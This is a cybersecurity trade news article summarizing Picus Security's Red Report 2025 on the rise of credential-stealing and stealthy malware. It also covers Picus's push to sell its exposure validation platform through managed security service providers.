Bad actors increasingly are looking to steal credentials from password stores, and are doing so with more complex and multi-staged attacks using sophisticated malware, according to a report released Tuesday by threat researchers with
Picus Security.
In its Red Report 2025, the Picus Labs researchers found that 25% of the malware analyzed last year was aimed at stealing credentials, a three-fold year-over-year jump. In addition, they said modern malware – which they describe with the coined term “SneakThief” – is evolving quickly, with a greater emphasis on stealth, persistence, and automation.
On average, malware samples now contain 14 malicious actions designed to evade detection, increase permissions, and exfiltrate data, they found.
Such growing sophistication in malware – as well as the sheer number of cyberattacks – are helping to convince enterprises and SMBs alike to migrate some or all of their cybersecurity operations to MSSPs and MSPs. That can be seen in the expected expansion of the global managed security services market, which is expected to grow from $25.67 billion this year to
$28.15 billion by 2029.
Picus and MSSPs
MSSPs play a central role in Picus’ efforts to grow the
reach of its Exposure Validation Platform, which is used to assess an organization’s security posture, according to Ryan Kunker, senior director of channels and alliances for the channel-first vendor.
“The strength of Picus' partner ecosystem is essential to ensuring that organizations worldwide can leverage its cutting-edge exposure validation solutions,” Kunker told MSSP Alert. “Every aspect of Picus' business is conducted exclusively through its trusted network of partners.”
1 Million+ Malware Samples Analyzed
The findings in the report come from analyzing more than a million pieces of malware that Picus Labs collected last year. The researchers found that data exfiltration and stealth tactics made up 11.3 million actions, with threat actors transitioning to covert exfiltration techniques – which they called “whispering channels” – like encrypted communications and living-off-the-land methods to essentially hide the malicious efforts in legitimate traffic.
“The stakes have never been higher,” the researchers wrote in the report. “Attackers are no longer just exploiting vulnerabilities but are conducting sophisticated, multi-stage operations that resemble, in many cases, a precision-planned burglary.”
Persistence and exfiltration capabilities come through such tactics as process injection and encrypted application layer protocols, they said.
As an interesting side note, the researchers said they didn’t find a significant increase from 2023 to last year in the use of AI-driven malware techniques used by hackers, despite ongoing worries about the emerging technology’s use by bad actors.
Credentials a Fast Way In
“Attackers realize that harvesting credentials can quickly pave the way to privileged systems or sensitive data,” Suleyman Ozarslan, Picus co-founder and vice president of Picus Labs, told MSSP Alert. “In many breaches, possessing an admin or domain-level credential is enough to compromise a large portion of an environment.”
They’re also using stealthy infostealers, allowing them to “remain in a network longer, siphoning credentials and escalating privileges, collecting and exfiltrating data,” Ozarslan said. “This prolonged network infiltration and data exfiltration allows them to exfiltrate crucial data and pivot to multiple systems undetected.”
More organizations are using password managers to make their passwords more secure, but this also makes them a high-value target for hackers, he said. They try to unlock the tools, scrape them in memory, or use previously stolen passwords to access password managers. They also try to extract master keys and decrypt stored passwords.
More Complex Attacks
Because of this, attacks are becoming more complex at a time when many enterprises still rely on signature-based tools, patchwork fixes, and quarterly vulnerability scans, Ozarslan said. They’re also hampered by personal shortages and growing alert volumes, stressing resources and time to investigate.
“Although widely recommended, true micro-segmentation and least-privilege access are still not uniformly enforced,” he said. “This leaves holes that well-funded or methodical adversaries freely exploit. Once inside, attackers move laterally, harvest credentials, and exfiltrate data.”
Unprepared security teams relying on outdated detection methods and without consistent visibility into their IT environments will respond slowly to breaches, giving attackers more dwell time.
MSSPs Shore Up Defenses
MSSPs can help bridge these gaps, Kunker said. That includes providing organizations with experienced security analysts, incident responders and security operations center (SOC) teams, regulatory and compliance expertise, security framework recommendations like zero trust architectures and network segmentation, security tool optimizations, and greater resilience.
There also is a synergy that can be found when using both MSSPs and Picus’ Exposure Validation Platform – MSSPs can interpret and act upon findings from the platform, while Picus provides automation testing and intelligence.
“Together, they enable businesses to detect, prioritize, and remediate security weaknesses effectively,” he said.
Picus continues to enhance and expand its MSSP Partner Program. In mid-January, the San Francisco-based company announced a
partnership with Presidio, with the MSP now using Picus’ capabilities for services that cover such areas as ransomware, SOCs, and automated red teaming.
At the same time, Picus unveiled partner program enhancements to make it easier for MSPs and MSSPs to integrate exposure validations services into their offerings, including more flexible licensing options, customizable reporting, multi-tenancy, and one-touch tenant creation.